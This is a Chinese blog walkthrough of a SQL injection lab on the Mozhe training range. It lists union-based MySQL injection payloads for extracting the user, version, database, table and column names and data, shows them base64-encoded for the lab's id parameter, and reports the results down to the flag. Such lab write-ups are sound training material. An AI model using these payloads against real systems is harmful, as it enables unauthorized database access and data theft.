SQL注入实战-MySQL

作者: 乖巧小墨宝 | 来源:发表于2018-04-15 23:16 被阅读80次

靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

进入靶场详情页,点击启动靶场,根据系统提供的信息进入靶场环境。

Php注入mysql查询语句,由地址中的“?id=MQo=”可以看出,此处传递时用了base64编码,base64解码“id=MQo=”为1,常用mysql注入语句:

这里仅列出常用的信息注入语句:

暴出字段数 order by x

利用内置函数暴出用户名 and 1=2 union select 1,user()

利用内置函数暴出数据库版本 and 1=2 union select 1,version()

利用内置函数暴出数据库名称and 1=2 union select 1,database()暴出表名:and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

暴出字段名:and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x64617461(必须是表名的十六进制表示)

暴出字段内容:and 1=2 union select 1,字段名 from 表名。

由上述常用暴库语句可以做出此题目,首先爆出数据库版本、数据库名称的基本名称。

“1 and 1=2 union select 1,version();”经过base64编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHZlcnNpb24oKTs=”,数据库版本为5.5.46-0ubuntu0.14.04.2:

“1 and 1=2 union select 1,database();”经过编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCk7”,数据库名称为test:

“1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database();“经过base64编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpOw==”,数据库表名为data:

“1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x64617461;” 经过base64编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjQ2MTc0NjE7”,表内字段为id,title,main,thekey:

“1 and 1=2 union select 1,thekey from data;”经过编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHRoZWtleSBmcm9tIGRhdGE7”,得到KEY值。

相关文章

  • web训练sql注入中级练习-墨者学堂

    sql注入实战mysql(进阶版) 看这个是base64编码 手工注入注入不出来。。。 使用sqlmap跑提示使用...

  • SQL注入实战-MySQL

    靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJB...

  • 堆叠注入

    SQL注入之堆叠注入 之前一直以为堆叠注入不适合mysql数据库,实战中也没有尝试过堆叠注入,今天看书《web安全...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • SQL注入漏洞案例实践学习记录(2018.7-2018.8)

    一、SQL注入简述 SQL注入漏洞测试的方式总结 SQL注入常用的内置函数整理(以MySql为例) 二、测试环境&...

  • DVWA之“SQL注入”

    漏洞类型:SQL注入/Get 字符型 安全级别:Low 目标:通过注入SQL语句,获取 MySql 数据库存放的用...

  • 2019-11-13

    mysql手工注入 一、SQL注入的理解 将特殊SQL语句添加到查询url后面,以获取非法的数据的操作。 ...

  • sql注入实战

    可以利用google的“inurl:”语法来找到一些url含参数的网站 示例:inurl:about.php?ca...

  • sql注入实战

    1、注入点判断 ‘ 与and 1=1 1=2 与and exists (select * from syso...

  • sqlmap使用

    环境准备: 假设存在sql注入的url是 一、基于mysql注入 a、sqlmap注入爆数据库 如下图显示,即爆出...

网友评论

    本文标题:SQL注入实战-MySQL

    本文链接:https://www.haomeiwen.com/subject/konjkftx.html